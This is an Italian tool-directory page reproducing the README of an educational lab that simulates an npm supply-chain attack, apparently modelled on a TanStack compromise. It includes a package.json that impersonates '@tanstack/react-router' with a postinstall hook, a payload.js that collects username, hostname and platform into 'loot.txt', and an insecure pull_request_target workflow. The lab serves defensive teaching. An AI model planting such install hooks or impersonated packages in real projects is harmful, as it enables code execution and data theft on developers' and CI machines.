Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/renewablehacking/cve-2026-45321-tanstack
Analisi delle VulnerabilitàAnalisi MalwareSicurezza della Supply ChainApprendimento e FormazioneLab e Pratica
GitHubrenewablehacking/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

Vedi Repository
23 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Laboratorio didattico che simula attacchi alla supply chain npm, abuso di CI/CD ed esecuzione di codice al momento dell'installazione tramite CVE-2026-45321. Ricerca difensiva pratica sulla sicurezza per comprendere il compromesso delle dipendenze e lo sfruttamento degli hook del ciclo di vita.

Condividi

Simulazione di Attacco alla Supply Chain — CVE-2026-45321 (TanStack)

Laboratorio didattico per comprendere gli attacchi alla supply chain npm, l'abuso di CI/CD e l'esecuzione di codice al momento dell'installazione

Disclaimer

Questo progetto è stato creato solo per:

  • apprendimento della sicurezza informatica,
  • ricerca sulla security difensiva,
  • simulazione di laboratorio locale,
  • comprendere il concetto di attacco alla supply chain.

Non utilizzare questo progetto per:

  • attaccare sistemi reali,
  • rubare credenziali,
  • distribuzione di malware,
  • accesso non autorizzato,
  • o altre attività illegali.

Descrizione

Questo laboratorio simula i concetti di base dell'incidente:

  • CVE-2026-45321
  • TanStack npm Supply Chain Compromise
  • Abuso di CI/CD di GitHub Actions
  • Esecuzione degli script del ciclo di vita di npm

La simulazione viene eseguita localmente e in sicurezza senza:

  • furto reale di credenziali,
  • esfiltrazione di token,
  • o compromissione di servizi di terze parti.

Struttura del Laboratorio

root@kitploit:~
lab/
├── fake-repo/          # Simulasi repository target
├── attacker-package/   # Simulasi package malicious
└── victim-project/     # Simulasi korban

Come Funziona la Simulazione

root@kitploit:~
Attacker Package
        ↓
npm install
        ↓
postinstall script berjalan
        ↓
payload.js dieksekusi otomatis
        ↓
Korban terkena install-time execution

Concetti Appresi

  • hook del ciclo di vita di npm
  • esecuzione arbitraria di codice al momento dell'installazione
  • attacco alla supply chain
  • limite di fiducia CI/CD
  • pacchetto npm dannoso
  • abuso di postinstall
  • compromissione delle dipendenze

Installazione

1. Clonare il Repository

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

Configurazione del Pacchetto Attaccante

2. Entrare nella Cartella del Pacchetto Attaccante

root@kitploit:~
cd attacker-package

3. Installare le Dipendenze

root@kitploit:~
npm install

4. Creare il Tarball del Pacchetto

root@kitploit:~
npm pack

Risultato:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

Simulazione della Vittima

5. Entrare nel Progetto della Vittima

root@kitploit:~
cd ../victim-project

6. Installare il Pacchetto Dannoso

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

Output

Se l'operazione riesce, apparirà:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

e il file:

root@kitploit:~
loot.txt

verrà creato automaticamente.


Esempio di payload.js

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

Esempio di package.json

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

Simulazione CI/CD

Questo progetto può essere utilizzato anche per comprendere:

  • GitHub Actions
  • pull_request_target
  • limite dei privilegi CI/CD
  • esecuzione delle dipendenze

Esempio di workflow:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

Relazione con CVE-2026-45321

Simulazione di laboratorioMondo reale
attacker-packagepacchetto TanStack compromesso
payload.jsinstaller dannoso
postinstallabuso delle hook del ciclo di vita
victim-projectsviluppatore/CI vittima
fake-repopipeline GitHub Actions

Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

Solo a Scopo Educativo

Questo laboratorio è stato creato per aumentare la consapevolezza su:

  • sicurezza della supply chain,
  • sicurezza delle dipendenze,
  • sicurezza di CI/CD,
  • e ricerca sulla security difensiva.
Scarica lo strumento